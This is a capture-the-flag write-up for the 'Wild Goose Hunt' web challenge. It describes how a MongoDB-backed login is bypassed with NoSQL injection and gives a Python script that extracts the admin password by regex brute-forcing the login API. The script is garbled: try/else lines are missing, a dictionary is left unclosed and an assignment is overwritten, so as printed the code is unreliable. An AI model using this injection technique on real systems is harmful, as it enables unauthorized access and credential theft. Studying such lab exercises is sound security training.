
Cyber Apocalypse 2021

Wild Goose Hunt

Solved by : thewhiteh4t

  • We have a cool login page and source of the web app for this one
  • entrypoint.sh contains the following :
    # Secure entrypoint
    chmod 600 /entrypoint.sh
    mkdir /tmp/mongodb
    mongod --noauth --dbpath /tmp/mongodb/ &
    sleep 2
    mongo heros --eval "db.createCollection('users')"
    mongo heros --eval 'db.users.insert( { username: "admin", password: "CHTB{f4k3_fl4g_f0r_t3st1ng}"} )'
    /usr/bin/supervisord -c /etc/supervisord.conf
  • we can see that the flag is being stored as the password of admin
  • we need to somehow extract the password
  • since its mongoDB first assumption was to check for NoSQL injection
  • Here is the error message we get in burp for a normal attempt

  • Lets switch to repeater here

  • so we are getting a json response and the message is being displayed in the frontend
  • next i tried some basic payloads for NoSQL injection

  • Authentication bypassed! but we dont get any functionality in the frontend so i proceeded with more payloads

  • This is an interesting payload because we can use a wildcard to check if a particular character is present in the password or not!
  • we know that the flag is the password and flag begins with CHTB{ so I tried that next

  • And it works again!
  • Now we can bruteforce characters and check for success message to get correct characters
  • I created a small python script for it
    #!/usr/bin/env python3
    ## Author    : thewhiteh4t ######
    ## Challenge : Wild Goose Hunt ##
    import json
    import requests
    ip = ''
    port = 31370
    url = f'http://{ip}:{port}/api/login'
    flag = 'CHTB{'
    charset = '_01234abcdefghijklmnopqrstuvwxyz'
    loop_iter = 1
    while flag.endswith('}') == False:
        for char in charset:
            if loop_iter == 1:
                payload = flag + char + '.*'
                payload = flag + '}'
            data = {
                'username': 'admin',
                'password[$regex]': payload
                rqst = requests.post(url, data=data)
            except Exception as e:
                print(f'[-] Exception : {e}')
            if rqst.status_code == 200:
                resp = rqst.text
                json_resp = json.loads(resp)
                status = json_resp['logged']
                if status == 1:
                    if payload.endswith('}') == False:
                        flag = payload.replace('.*', '')
                        flag = payload
                        print(f'FLAG : {flag}')
                    print(f'FLAG : {flag}')
                    loop_iter = 0
                print(f'[-] Error : {rqst.status_code}')
        loop_iter += 1

Published on : 24 Apr 2021